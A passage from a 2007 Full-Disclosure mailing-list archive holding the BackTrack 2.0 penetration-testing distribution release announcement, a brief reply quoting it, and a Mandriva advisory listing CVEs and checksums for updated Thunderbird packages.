iD8DBQFF7ewBXm3vHE4uyloRAp+FAKDK2+l25JCKPiiY/BJc6LCarkFLbgCfck0k Wr6nOPT+eQ6P3Z+mSFoLA/o= =7tJE -----END PGP SIGNATURE----- From muts at offensive-security.com Tue Mar 6 23:04:53 2007 From: muts at offensive-security.com (Mati Aharoni) Date: Wed, 7 Mar 2007 01:04:53 +0200 Subject: [Full-disclosure] BackTrack v.2.0 Is out Message-ID: <008101c76043$dbb8dfb0$932a9f10$@com> Dear List, BackTrack v.2.0 Final is out! It's taken us almost 5 months to pull ourselves out of the beta stage. Every time we thought we were done, a new idea or improvement would surface, and we just *had* to implement it. Many features were added, and many of the old (yet persistent) bugs were fixed. We honestly believe that BackTrack v 2.0 Final is the leanest, meanest and sexiest version to come out and hope that you enjoy using it as much as we did making it. Get yours at http://www.remote-exploit.org === Wireless Attacks @ their best === * We included a bunch of new drivers into the latest release and where able to make the desired packet injection functionalities to a wider audience. * By supporting the new ALFA USB hi-power devices there is now a great USB wireless dongle available which allows us to connect an external antenna and use BackTrack to attack even on Intel Macbook or VMware. * Broadcom 43xx based cards should be able to inject - a bit sloppy but should work. * The following drivers are now on our CD: * madwifi-ng (Patched for Injection) * hostap (Patched for Injection) * prism54 (Patched for Injection) * bcm43xx (Patched for Injection) * rtl8180 (Patched for Injection) * rtl8187 (Patched for Injection) * ipw2200 (Patched for Injection) * rt2570 (ASPj's Drivers) * rt2500 * rt61 * rt73 * ipw2100 * ipw3945 * acx100 * zd1211rw === Faster @ Work === * Most of our Main-menu entries have a grouping "All" menu, which allows the experienced user to quickly find a tool. * Less experienced users are guided through the new menu structure to find the right tools for the right tasks. === Alignment to Open Standards and Frameworks === * Being superior while staying easy to use is key to a good security live cd. We took things a step further and aligned BackTrack to Penetration Testing Methodologies and Assessment Frameworks (ISSAF and OSSTMM). This will help our professional users during their daily reporting nightmares. * The most obvious alignment can be seen in the menu structure and framework documentation that has been included into BackTrack. * We suggest that you take your time to read the Frameworks, especially the ISSAF methodology guide. * Unfortunately we were not able to include a newer OSSTMM paper because they did not release it to the public. === Cutting Edge Exploitation Framework & Information === * We put extra effort in integrating Metasploit Framework3 as well as the Stable Metasploit Framework2. Features such as db_autopwn, Wifi driver exploits etc are all functional. * Default password lists and online resources have been added and updated. === Latest Tech === * Packages are now based on the Slax 6 LZM format, which allowed use to get more space and work in a more stable environment * We are running on a tweaked Kernel 2.6.20 * Apple patches are applied * Broad Wireless Card Support * Lorcon Wifi / Metasploit integration * Wireshark Wifi Frame Injection patch * Japanese Input support * Over 300 updated security tools * New section related to VoIP === Disappointments === As usual, Nessus is not included into BackTrack as Tenable forbid redistribution. === Community === * The public wiki project is available at http://backtrack.offensive-security.com. Please help us by providing entries in HCL (Hardware compatibility list) * Meet us at irc.freenode.org #remote-exploit === Thank You === * We would like to thank every developer, tester and our users. Without you, BackTrack would simply not be what it is today, But most of all we like to thank our wives and families who supported us with this creative endeavor. Signing out, Muts, Max and Mjm http://www.remote exploit.org http://www.offensive-security.com -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070307/859973ee/attachment.html From jammer128 at gmail.com Wed Mar 7 00:23:39 2007 From: jammer128 at gmail.com (Jason Miller) Date: Tue, 6 Mar 2007 18:23:39 -0600 Subject: [Full-disclosure] BackTrack v.2.0 Is out In-Reply-To: <008101c76043$dbb8dfb0$932a9f10$@com> References: <008101c76043$dbb8dfb0$932a9f10$@com> Message-ID: <829b2de40703061623k2929f0afre616944d7dbd5821@mail.gmail.com> Been following this project since before Whax. Still one of my fave penetration testing distros. :-) On 3/6/07, Mati Aharoni wrote: > > Dear List, > > > > BackTrack v.2.0 Final is out! > > It's taken us almost 5 months to pull ourselves out of the beta stage. > Every time we thought we were done, a new idea or improvement would surface, > and we just *had* to implement it. Many features were added, and many of the > old (yet persistent) bugs were fixed. > > > > We honestly believe that BackTrack v 2.0 Final is the leanest, meanest and > sexiest version to come out and hope that you enjoy using it as much as we > did making it. > > > > Get yours at http://www.remote-exploit.org > > > > === Wireless Attacks @ their best === > > * We included a bunch of new drivers into the latest release and where > able to make the desired packet injection functionalities to a wider > audience. > > * By supporting the new ALFA USB hi-power devices there is now a great USB > wireless dongle available which allows us to connect an external antenna and > use BackTrack to attack even on Intel Macbook or VMware. > > * Broadcom 43xx based cards should be able to inject - a bit sloppy but > should work. > > * The following drivers are now on our CD: > > * madwifi-ng (Patched for Injection) > > * hostap (Patched for Injection) > > * prism54 (Patched for Injection) > > * bcm43xx (Patched for Injection) > > * rtl8180 (Patched for Injection) > > * rtl8187 (Patched for Injection) > > * ipw2200 (Patched for Injection) > > * rt2570 (ASPj's Drivers) > > * rt2500 > > * rt61 > > * rt73 > > * ipw2100 > > * ipw3945 > > * acx100 > > * zd1211rw > > > > === Faster @ Work === > > * Most of our Main-menu entries have a grouping "All" menu, which allows > the experienced user to quickly find a tool. > > * Less experienced users are guided through the new menu structure to find > the right tools for the right tasks. > > > > === Alignment to Open Standards and Frameworks === > > * Being superior while staying easy to use is key to a good security live > cd. We took things a step further and aligned BackTrack to Penetration > Testing Methodologies and Assessment Frameworks (ISSAF and OSSTMM). This > will help our professional users during their daily reporting nightmares. > > * The most obvious alignment can be seen in the menu structure and > framework documentation that has been included into BackTrack. > > * We suggest that you take your time to read the Frameworks, especially > the ISSAF methodology guide. > > * Unfortunately we were not able to include a newer OSSTMM paper because > they did not release it to the public. > > > > === Cutting Edge Exploitation Framework & Information === > > * We put extra effort in integrating Metasploit Framework3 as well as the > Stable Metasploit Framework2. Features such as db_autopwn, Wifi driver > exploits etc are all functional. > > * Default password lists and online resources have been added and updated. > > > > === Latest Tech === > > * Packages are now based on the Slax 6 LZM format, which allowed use to > get more space and work in a more stable environment > > * We are running on a tweaked Kernel 2.6.20 > > * Apple patches are applied > > * Broad Wireless Card Support > > * Lorcon Wifi / Metasploit integration > > * Wireshark Wifi Frame Injection patch > > * Japanese Input support > > * Over 300 updated security tools > > * New section related to VoIP > > > > === Disappointments === > > As usual, Nessus is not included into BackTrack as Tenable forbid > redistribution. > > > > === Community === > > * The public wiki project is available at > http://backtrack.offensive-security.com. Please help us by providing > entries in HCL (Hardware compatibility list) > > * Meet us at irc.freenode.org #remote-exploit > > > > === Thank You === > > * We would like to thank every developer, tester and our users. Without > you, BackTrack would simply not be what it is today, But most of all we like > to thank our wives and families who supported us with this creative > endeavor. > > > > Signing out, > > > > Muts, Max and Mjm > > > > http://www.remote exploit.org > > http://www.offensive-security.com > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070306/16f71027/attachment.html From security at mandriva.com Wed Mar 7 01:56:47 2007 From: security at mandriva.com (security at mandriva.com) Date: Tue, 06 Mar 2007 18:56:47 -0700 Subject: [Full-disclosure] [ MDKSA-2007:052 ] - Updated Thunderbird packages fix multiple vulnerabilities Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDKSA-2007:052 http://www.mandriva.com/security/ _______________________________________________________________________ Package : mozilla-thunderbird Date : March 6, 2007 Affected: 2007.0, Corporate 3.0 _______________________________________________________________________ Problem Description: A number of security vulnerabilities have been discovered and corrected in the latest Mozilla Thunderbird program, version 1.5.0.10. This update provides the latest Thunderbird to correct these issues. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0008 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0009 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0775 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0776 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0777 http://www.mozilla.org/security/announce/2007/mfsa2006-01.html http://www.mozilla.org/security/announce/2007/mfsa2006-06.html http://www.mozilla.org/security/announce/2007/mfsa2006-10.html _______________________________________________________________________ Updated Packages: Mandriva Linux 2007.0: d73cef3e4423ef6aeccd63ac79497c6e 2007.0/i586/mozilla-thunderbird-1.5.0.10-1mdv2007.0.i586.rpm 965e504ea75b78c6e635ea6a38a38bb6 2007.0/i586/mozilla-thunderbird-bg-1.5.0.10-1mdv2007.0.i586.rpm 942e112f107d12d349d98744ce587c5b 2007.0/i586/mozilla-thunderbird-ca-1.5.0.10-1mdv2007.0.i586.rpm 0ce0bb2087410e68f804621768f8c7f2 2007.0/i586/mozilla-thunderbird-cs-1.5.0.10-1mdv2007.0.i586.rpm 6d080060a704024a1d483ee48883a6c5 2007.0/i586/mozilla-thunderbird-da-1.5.0.10-1mdv2007.0.i586.rpm 22618f920657cd2d6c40da6db316e39f 2007.0/i586/mozilla-thunderbird-de-1.5.0.10-1mdv2007.0.i586.rpm cce22b318b84e1253b7c5bb66da65a19 2007.0/i586/mozilla-thunderbird-devel-1.5.0.10-1mdv2007.0.i586.rpm bd3e36e9570523b2474c433793584777 2007.0/i586/mozilla-thunderbird-el-1.5.0.10-1mdv2007.0.i586.rpm ca81de87260cadcb163a5dee5319bdbc 2007.0/i586/mozilla-thunderbird-enigmail-1.5.0.10-1mdv2007.0.i586.rpm d68f93e05f308c74f06e707ba0952a01 2007.0/i586/mozilla-thunderbird-enigmail-ca-1.5.0.10-1mdv2007.0.i586.rpm 145d4c7babc60d7a82d313ada5f5d03f 2007.0/i586/mozilla-thunderbird-enigmail-cs-1.5.0.10-1mdv2007.0.i586.rpm 590fbecb711e50c04fc77522a0ccf8d7 2007.0/i586/mozilla-thunderbird-enigmail-de-1.5.0.10-1mdv2007.0.i586.rpm fcf7172153539fe1a78474eee59a48e9 2007.0/i586/mozilla-thunderbird-enigmail-el-1.5.0.10-1mdv2007.0.i586.rpm 607fff520cb0747dbef7837bcb05fb67 2007.0/i586/mozilla-thunderbird-enigmail-es-1.5.0.10-1mdv2007.0.i586.rpm 75969698970ee1e35a2e8b31d0f9945d 2007.0/i586/mozilla-thunderbird-enigmail-es_AR-1.5.0.10-1mdv2007.0.i586.rpm e1307b218c1e65216d7429481cfa0ba3 2007.0/i586/mozilla-thunderbird-enigmail-fi-1.5.0.10-1mdv2007.0.i586.rpm 1c51e0b62608745fd91f4d0267674541 2007.0/i586/mozilla-thunderbird-enigmail-fr-1.5.0.10-1mdv2007.0.i586.rpm ce9a77467fb993871990b12b4ad82492 2007.0/i586/mozilla-thunderbird-enigmail-hu-1.5.0.10-1mdv2007.0.i586.rpm e0cc383028a944d2c07c50777f6d3f14 2007.0/i586/mozilla-thunderbird-enigmail-it-1.5.0.10-1mdv2007.0.i586.rpm e55280078287ed275c2685e33f5b9381 2007.0/i586/mozilla-thunderbird-enigmail-ja-1.5.0.10-1mdv2007.0.i586.rpm 643edc5d96ed4d5ff16cfd4c177fa1b4 2007.0/i586/mozilla-thunderbird-enigmail-nb-1.5.0.10-1mdv2007.0.i586.rpm 4036540cd8abb8ee46975d8ff8e39a8d 2007.0/i586/mozilla-thunderbird-enigmail-nl-1.5.0.10-1mdv2007.0.i586.rpm fb252bf6688273a5d6aae5eb034753db 2007.0/i586/mozilla-thunderbird-enigmail-pl-1.5.0.10-1mdv2007.0.i586.rpm df5c04c819bea04d2883dc703857c5d9 2007.0/i586/mozilla-thunderbird-enigmail-pt-1.5.0.10-1mdv2007.0.i586.rpm 4ba759b818e49976d412419153bcd239 2007.0/i586/mozilla-thunderbird-enigmail-pt_BR-1.5.0.10-1mdv2007.0.i586.rpm 59fe920de5e879b0f8c4f48cec188c36 2007.0/i586/mozilla-thunderbird-enigmail-ru-1.5.0.10-1mdv2007.0.i586.rpm 85f6cd9eb62c95827989f742382890ba 2007.0/i586/mozilla-thunderbird-enigmail-sk-1.5.0.10-1mdv2007.0.i586.rpm e6f05601ce13f9b88864941b8c60acbd 2007.0/i586/mozilla-thunderbird-enigmail-sl-1.5.0.10-1mdv2007.0.i586.rpm 2c95b2f4b384c2c93de680b3ca9998a4 2007.0/i586/mozilla-thunderbird-enigmail-sv-1.5.0.10-1mdv2007.0.i586.rpm 134fd1a1f1c4e22c97383d7d64a5162c 2007.0/i586/mozilla-thunderbird-enigmail-zh_CN-1.5.0.10-1mdv2007.0.i586.rpm dfbce9644ee9dd8ef2c57d39f5ad0daa 2007.0/i586/mozilla-thunderbird-es-1.5.0.10-1mdv2007.0.i586.rpm 692b55a319fd2e8b46cd2617454eb4cb 2007.0/i586/mozilla-thunderbird-es_AR-1.5.0.10-1mdv2007.0.i586.rpm 7c0b3cb59b74c0879edaad7feb7d4de2 2007.0/i586/mozilla-thunderbird-eu-1.5.0.10-1mdv2007.0.i586.rpm 2480853f936a609ef59ec3c930bcf21e 2007.0/i586/mozilla-thunderbird-fi-1.5.0.10-1mdv2007.0.i586.rpm 8d0d04ab5e525b60415d5540f2a74638 2007.0/i586/mozilla-thunderbird-fr-1.5.0.10-1mdv2007.0.i586.rpm 127b1d46adc024e3f583e311a8c90c1a 2007.0/i586/mozilla-thunderbird-ga-1.5.0.10-1mdv2007.0.i586.rpm ad6937fec743ebddc289f428ed4c590e 2007.0/i586/mozilla-thunderbird-gu_IN-1.5.0.10-1mdv2007.0.i586.rpm ee66b374e225e8023343ad7b9e39d128 2007.0/i586/mozilla-thunderbird-he-1.5.0.10-1mdv2007.0.i586.rpm 2a5cf1ba8f485050d64fce27876c5e53 2007.0/i586/mozilla-thunderbird-hu-1.5.0.10-1mdv2007.0.i586.rpm 5b7493e6e391748c58393513d20fc543 2007.0/i586/mozilla-thunderbird-it-1.5.0.10-1mdv2007.0.i586.rpm 16400b32fd07ddc23d050a0d87d67182 2007.0/i586/mozilla-thunderbird-ja-1.5.0.10-1mdv2007.0.i586.rpm 27fff844515f71af94b80d0603c90a56 2007.0/i586/mozilla-thunderbird-ko-1.5.0.10-1mdv2007.0.i586.rpm 312f51fdb7066b164ff047ffe702b59d 2007.0/i586/mozilla-thunderbird-lt-1.5.0.10-1mdv2007.0.i586.rpm d2900e5d0a2ab1ea8b52d44d7681e06a 2007.0/i586/mozilla-thunderbird-mk-1.5.0.10-1mdv2007.0.i586.rpm 84423a5d0e97d8c6c651d50cf057fd0e 2007.0/i586/mozilla-thunderbird-nb-1.5.0.10-1mdv2007.0.i586.rpm 88167643e533b2e38e909c0e54f8576c 2007.0/i586/mozilla-thunderbird-nl-1.5.0.10-1mdv2007.0.i586.rpm 57c3a5ab8f0c8cc818963a36aaa72855 2007.0/i586/mozilla-thunderbird-pa_IN-1.5.0.10-1mdv2007.0.i586.rpm 99bab76c25ac6ba62e8d75f46e5fbfea 2007.0/i586/mozilla-thunderbird-pl-1.5.0.10-1mdv2007.0.i586.rpm 154035410a1292e1d2af16a2be3911e5 2007.0/i586/mozilla-thunderbird-pt_BR-1.5.0.10-1mdv2007.0.i586.rpm 3e2662fa8c25634c36f7eba05b6062d3 2007.0/i586/mozilla-thunderbird-ru-1.5.0.10-1mdv2007.0.i586.rpm 0a26cb7fa4c4fc36e11fcefe4544cee1 2007.0/i586/mozilla-thunderbird-sk-1.5.0.10-1mdv2007.0.i586.rpm 70a37725b2973be071a46260d1630e2f 2007.0/i586/mozilla-thunderbird-sl-1.5.0.10-1mdv2007.0.i586.rpm df7b38ac07581258fcfe47f3be64021c 2007.0/i586/mozilla-thunderbird-sv-1.5.0.10-1mdv2007.0.i586.rpm f60c6529247283e240cab74daf3bcaef 2007.0/i586/mozilla-thunderbird-tr-1.5.0.10-1mdv2007.0.i586.rpm 29addc886af8ca4695341606853b1549 2007.0/i586/mozilla-thunderbird-zh_CN-1.5.0.10-1mdv2007.0.i586.rpm 52742f3b6d2426c1ba01c2af91c68ec9 2007.0/i586/nsinstall-1.5.0.10-1mdv2007.0.i586.rpm 46b8dbe1a61ecd178d10d37d7dd82142 2007.0/SRPMS/mozilla-thunderbird-1.5.0.10-1mdv2007.0.src.rpm c6832073064476f9ac955fa74e1e28a8 2007.0/SRPMS/mozilla-thunderbird-enigmail-l10n-1.5.0.10-1mdv2007.0.src.rpm 0cd31f1a25e221fdbee15fcd57cd7484 2007.0/SRPMS/mozilla-thunderbird-l10n-1.5.0.10-1mdv2007.0.src.rpm Mandriva Linux 2007.0/X86_64: 117e4eb10c1ef76fdad36dc3d1cd7df0 2007.0/x86_64/mozilla-thunderbird-1.5.0.10-1mdv2007.0.x86_64.rpm 9a5a0f36608618b119daf9e95ef28545 2007.0/x86_64/mozilla-thunderbird-bg-1.5.0.10-1mdv2007.0.x86_64.rpm 377acc304d5a9af67bae159c2d08e067 2007.0/x86_64/mozilla-thunderbird-ca-1.5.0.10-1mdv2007.0.x86_64.rpm ccc872d528bc0f92fd5a203223fc38e3 2007.0/x86_64/mozilla-thunderbird-cs-1.5.0.10-1mdv2007.0.x86_64.rpm c5f07c39800696096274b3cd2da14fc0 2007.0/x86_64/mozilla-thunderbird-da-1.5.0.10-1mdv2007.0.x86_64.rpm a5f0db6f3ad60d80eb9be91d115a7900 2007.0/x86_64/mozilla-thunderbird-de-1.5.0.10-1mdv2007.0.x86_64.rpm 2d29c6c352ec59c07c825182e65ab46e 2007.0/x86_64/mozilla-thunderbird-devel-1.5.0.10-1mdv2007.0.x86_64.rpm 4830a368991d379abb80b5efcf888963 2007.0/x86_64/mozilla-thunderbird-el-1.5.0.10-1mdv2007.0.x86_64.rpm 77948028ddf33360921f45e2ea89429b 2007.0/x86_64/mozilla-thunderbird-enigmail-1.5.0.10-1mdv2007.0.x86_64.rpm b19d2df09984f95bda3584e0d9cbc6e2 2007.0/x86_64/mozilla-thunderbird-enigmail-ca-1.5.0.10-1mdv2007.0.x86_64.rpm 4e3aa10182da0cd7060ed704d9f0f206 2007.0/x86_64/mozilla-thunderbird-enigmail-cs-1.5.0.10-1mdv2007.0.x86_64.rpm dce1ea10980ee0af2c687b3dac3dc6d6 2007.0/x86_64/mozilla-thunderbird-enigmail-de-1.5.0.10-1mdv2007.0.x86_64.rpm ace7d862cb88f09bc4ec902aec7234dd 2007.0/x86_64/mozilla-thunderbird-enigmail-el-1.5.0.10-1mdv2007.0.x86_64.rpm 6c4c83ad0c9c8bb3aae2eb13ab6d5aad 2007.0/x86_64/mozilla-thunderbird-enigmail-es-1.5.0.10-1mdv2007.0.x86_64.rpm 5584994e25bb956b289c8e1419e84716 2007.0/x86_64/mozilla-thunderbird-enigmail-es_AR-1.5.0.10-1mdv2007.0.x86_64.rpm cc2a95f92f840d37d597d99925ed0807 2007.0/x86_64/mozilla-thunderbird-enigmail-fi-1.5.0.10-1mdv2007.0.x86_64.rpm d449d8378f437a6aec730423eeb08236 2007.0/x86_64/mozilla-thunderbird-enigmail-fr-1.5.0.10-1mdv2007.0.x86_64.rpm 9c2a68a5df80bcd825fcdf82596f68f9 2007.0/x86_64/mozilla-thunderbird-enigmail-hu-1.5.0.10-1mdv2007.0.x86_64.rpm c31651fee1d8784e02be0cdeb91b2ae0 2007.0/x86_64/mozilla-thunderbird-enigmail-it-1.5.0.10-1mdv2007.0.x86_64.rpm a9f9519a1375f7cf4f314db44d06e895 2007.0/x86_64/mozilla-thunderbird-enigmail-ja-1.5.0.10-1mdv2007.0.x86_64.rpm 1cad629e72bfb698225a83e10d771dd9 2007.0/x86_64/mozilla-thunderbird-enigmail-nb-1.5.0.10-1mdv2007.0.x86_64.rpm 7d4058cd63eb22c5d44ed5c3502ea62e 2007.0/x86_64/mozilla-thunderbird-enigmail-nl-1.5.0.10-1mdv2007.0.x86_64.rpm 2c808ce923ea412f76d5a7ce33b05d03 2007.0/x86_64/mozilla-thunderbird-enigmail-pl-1.5.0.10-1mdv2007.0.x86_64.rpm c11cbc0d0fb7fd305c6b88f6aa0abcd9 2007.0/x86_64/mozilla-thunderbird-enigmail-pt-1.5.0.10-1mdv2007.0.x86_64.rpm 5a10c322d443fc96b74e19ebbbc0dfab 2007.0/x86_64/mozilla-thunderbird-enigmail-pt_BR-1.5.0.10-1mdv2007.0.x86_64.rpm 7b9cc3ef30b02bdaceb6a376e86cca27 2007.0/x86_64/mozilla-thunderbird-enigmail-ru-1.5.0.10-1mdv2007.0.x86_64.rpm 0689876738362963affdc932894c7c36 2007.0/x86_64/mozilla-thunderbird-enigmail-sk-1.5.0.10-1mdv2007.0.x86_64.rpm e61ea72cea40113e5f52c1a08daeee07 2007.0/x86_64/mozilla-thunderbird-enigmail-sl-1.5.0.10-1mdv2007.0.x86_64.rpm a01bb2cd931e1d48be01115d85fd51ae 2007.0/x86_64/mozilla-thunderbird-enigmail-sv-1.5.0.10-1mdv2007.0.x86_64.rpm ce868e6fee5b6d158873aeb4c3ce706b 2007.0/x86_64/mozilla-thunderbird-enigmail-zh_CN-1.5.0.10-1mdv2007.0.x86_64.rpm 270c5522e6577b6538b16e825ea97b52 2007.0/x86_64/mozilla-thunderbird-es-1.5.0.10-1mdv2007.0.x86_64.rpm 5f88e2f1af9f88b97b1b86b39c07a8e6 2007.0/x86_64/mozilla-thunderbird-es_AR-1.5.0.10-1mdv2007.0.x86_64.rpm 9876c47855193a11cc78a557e3c520f4 2007.0/x86_64/mozilla-thunderbird-eu-1.5.0.10-1mdv2007.0.x86_64.rpm 16bdbcd61ed2f5e2478e1591ec7d07bf 2007.0/x86_64/mozilla-thunderbird-fi-1.5.0.10-1mdv2007.0.x86_64.rpm 6762d343afe44e93dd1692e6cf164c74 2007.0/x86_64/mozilla-thunderbird-fr-1.5.0.10-1mdv2007.0.x86_64.rpm 8b7fc49a5f09ccb34250cf8905b78a0c 2007.0/x86_64/mozilla-thunderbird-ga-1.5.0.10-1mdv2007.0.x86_64.rpm 52dd38081e4b0de675a4f343db8c2304 2007.0/x86_64/mozilla-thunderbird-gu_IN-1.5.0.10-1mdv2007.0.x86_64.rpm eaf380221768913b91ab492759267367 2007.0/x86_64/mozilla-thunderbird-he-1.5.0.10-1mdv2007.0.x86_64.rpm acd42c36351e9e03658b16cde8989994 2007.0/x86_64/mozilla-thunderbird-hu-1.5.0.10-1mdv2007.0.x86_64.rpm 21781fa31a5a64f2b000c67bd3ec64ec 2007.0/x86_64/mozilla-thunderbird-it-1.5.0.10-1mdv2007.0.x86_64.rpm e849f7b5e8753098e7d7e07eb078bcee 2007.0/x86_64/mozilla-thunderbird-ja-1.5.0.10-1mdv2007.0.x86_64.rpm 5be83b9bab018b8ae03660223d3c9a83 2007.0/x86_64/mozilla-thunderbird-ko-1.5.0.10-1mdv2007.0.x86_64.rpm 2ab3311d6100a7f97236103fe50735ac 2007.0/x86_64/mozilla-thunderbird-lt-1.5.0.10-1mdv2007.0.x86_64.rpm 8279d4761e6f40941d70ad1863683724 2007.0/x86_64/mozilla-thunderbird-mk-1.5.0.10-1mdv2007.0.x86_64.rpm d6e8f372ffce5a01e2b49059af8c1607 2007.0/x86_64/mozilla-thunderbird-nb-1.5.0.10-1mdv2007.0.x86_64.rpm 17f29f137a8c175b5a3d67fcaf0f139e 2007.0/x86_64/mozilla-thunderbird-nl-1.5.0.10-1mdv2007.0.x86_64.rpm f1cc6c12062c1724b213d949b5c776a4 2007.0/x86_64/mozilla-thunderbird-pa_IN-1.5.0.10-1mdv2007.0.x86_64.rpm 63e6725a03b207964e0250179ed01fc2 2007.0/x86_64/mozilla-thunderbird-pl-1.5.0.10-1mdv2007.0.x86_64.rpm 8850366b1877c9a35287750f48a6e16f 2007.0/x86_64/mozilla-thunderbird-pt_BR-1.5.0.10-1mdv2007.0.x86_64.rpm 36533988ec1dc826264d56a4e5846ca7 2007.0/x86_64/mozilla-thunderbird-ru-1.5.0.10-1mdv2007.0.x86_64.rpm 9505e790a8a20e31576615f8daf9ed1a 2007.0/x86_64/mozilla-thunderbird-sk-1.5.0.10-1mdv2007.0.x86_64.rpm d1aaaf5351d85c82eab4e2c784a76c12 2007.0/x86_64/mozilla-thunderbird-sl-1.5.0.10-1mdv2007.0.x86_64.rpm 8b199d144af36be054127cf563a29003 2007.0/x86_64/mozilla-thunderbird-sv-1.5.0.10-1mdv2007.0.x86_64.rpm e9203cd4b22c3fffcc51bad017a6df7c 2007.0/x86_64/mozilla-thunderbird-tr-1.5.0.10-1mdv2007.0.x86_64.rpm 0dd8ecba456941ca641f642ae3224055 2007.0/x86_64/mozilla-thunderbird-zh_CN-1.5.0.10-1mdv2007.0.x86_64.rpm 8956d2fa944c78ddd4b73e51c7974087 2007.0/x86_64/nsinstall-1.5.0.10-1mdv2007.0.x86_64.rpm 46b8dbe1a61ecd178d10d37d7dd82142 2007.0/SRPMS/mozilla-thunderbird-1.5.0.10-1mdv2007.0.src.rpm c6832073064476f9ac955fa74e1e28a8 2007.0/SRPMS/mozilla-thunderbird-enigmail-l10n-1.5.0.10-1mdv2007.0.src.rpm 0cd31f1a25e221fdbee15fcd57cd7484 2007.0/SRPMS/mozilla-thunderbird-l10n-1.5.0.10-1mdv2007.0.src.rpm Corporate 3.0: 9273740d506e00cb080d4655d3534f8b corporate/3.0/i586/mozilla-thunderbird-1.5.0.10-0.1.C30mdk.i586.rpm d1ccc3d4dbf8cd41a0d9ca32a6a780f9 corporate/3.0/i586/mozilla-thunderbird-bg-1.5.0.10-0.2.C30mdk.i586.rpm f419369b8af3bd2357faaa8ed4283ad9 corporate/3.0/i586/mozilla-thunderbird-ca-1.5.0.10-0.2.C30mdk.i586.rpm 2ccea0e6d34589ee1dd6d86e2dbed0c7 corporate/3.0/i586/mozilla-thunderbird-cs-1.5.0.10-0.2.C30mdk.i586.rpm 62dce3896edb8695b41083a44331dbb9 corporate/3.0/i586/mozilla-thunderbird-da-1.5.0.10-0.2.C30mdk.i586.rpm ed71d342ec42b46f0c46e9cbd44500f5 corporate/3.0/i586/mozilla-thunderbird-de-1.5.0.10-0.2.C30mdk.i586.rpm b7ef583c8c77295cf79f21c1d1341779 corporate/3.0/i586/mozilla-thunderbird-devel-1.5.0.10-0.1.C30mdk.i586.rpm 4e5b4fbfd8fcc19ac21284748bc9d732 corporate/3.0/i586/mozilla-thunderbird-el-1.5.0.10-0.2.C30mdk.i586.rpm a15f868fe97c690bc5f9cf118d70921b corporate/3.0/i586/mozilla-thunderbird-enigmail-1.5.0.10-0.1.C30mdk.i586.rpm d16004f03a33a5317ecf56749b3baed9 corporate/3.0/i586/mozilla-thunderbird-enigmail-ca-1.5.0.10-0.2.C30mdk.i586.rpm df16b35a5fd84e328d83dce3921d8cf7 corporate/3.0/i586/mozilla-thunderbird-enigmail-cs-1.5.0.10-0.2.C30mdk.i586.rpm 534579e8aabc3bcf8c5649f0635b4d54 corporate/3.0/i586/mozilla-thunderbird-enigmail-de-1.5.0.10-0.2.C30mdk.i586.rpm 8577874314f02e15b970b27baf491da3 corporate/3.0/i586/mozilla-thunderbird-enigmail-el-1.5.0.10-0.2.C30mdk.i586.rpm 9dfbc99c662ec55dea018e640e4d28e9 corporate/3.0/i586/mozilla-thunderbird-enigmail-es-1.5.0.10-0.2.C30mdk.i586.rpm 0473111f44afb83767c3fe41638a66ae corporate/3.0/i586/mozilla-thunderbird-enigmail-es_AR-1.5.0.10-0.2.C30mdk.i586.rpm 31ec12b136776ee7247891c270c21d1c corporate/3.0/i586/mozilla-thunderbird-enigmail-fi-1.5.0.10-0.2.C30mdk.i586.rpm d4b214542ae9c763039b3941bafa6f17 corporate/3.0/i586/mozilla-thunderbird-enigmail-fr-1.5.0.10-0.2.C30mdk.i586.rpm 5b369dce035dbd5f1bd1fd9c58ae96eb corporate/3.0/i586/mozilla-thunderbird-enigmail-hu-1.5.0.10-0.2.C30mdk.i586.rpm c8825163de4113720d2d2b9f1ec54e58 corporate/3.0/i586/mozilla-thunderbird-enigmail-it-1.5.0.10-0.2.C30mdk.i586.rpm da2ec244863ee926dd8270c02fffca27 corporate/3.0/i586/mozilla-thunderbird-enigmail-ja-1.5.0.10-0.2.C30mdk.i586.rpm 40c5b505003f6ac5d330befded47dc6e corporate/3.0/i586/mozilla-thunderbird-enigmail-nb-1.5.0.10-0.2.C30mdk.i586.rpm 19dad617e119e3fe942441a279d4b3fd corporate/3.0/i586/mozilla-thunderbird-enigmail-nl-1.5.0.10-0.2.C30mdk.i586.rpm 8c2c932e0007b5d729aae574123890ae corporate/3.0/i586/mozilla-thunderbird-enigmail-pl-1.5.0.10-0.2.C30mdk.i586.rpm ec8053e43b1c7d702866249928558e0f corporate/3.0/i586/mozilla-thunderbird-enigmail-pt-1.5.0.10-0.2.C30mdk.i586.rpm 7d45004f8e4bb9a3b25f5f4fac9838a5 corporate/3.0/i586/mozilla-thunderbird-enigmail-pt_BR-1.5.0.10-0.2.C30mdk.i586.rpm bcb1d23ab9aad20cbfbc78989f2f0cd2 corporate/3.0/i586/mozilla-thunderbird-enigmail-ru-1.5.0.10-0.2.C30mdk.i586.rpm 4fc582f98face6236caf535b9bbacad2 corporate/3.0/i586/mozilla-thunderbird-enigmail-sk-1.5.0.10-0.2.C30mdk.i586.rpm 622ab027440a923b3f9967fee9c111b2 corporate/3.0/i586/mozilla-thunderbird-enigmail-sl-1.5.0.10-0.2.C30mdk.i586.rpm a7eab843b4ded1e32bdfa1883048a8a1 corporate/3.0/i586/mozilla-thunderbird-enigmail-sv-1.5.0.10-0.2.C30mdk.i586.rpm be62409e36445de38fd923d8d1e46c39 corporate/3.0/i586/mozilla-thunderbird-enigmail-zh_CN-1.5.0.10-0.2.C30mdk.i586.rpm b27674042c9841198dbf609c3267a305 corporate/3.0/i586/mozilla-thunderbird-es-1.5.0.10-0.2.C30mdk.i586.rpm ba6f270f81590fcde3449059ac81eea4 corporate/3.0/i586/mozilla-thunderbird-es_AR-1.5.0.10-0.2.C30mdk.i586.rpm 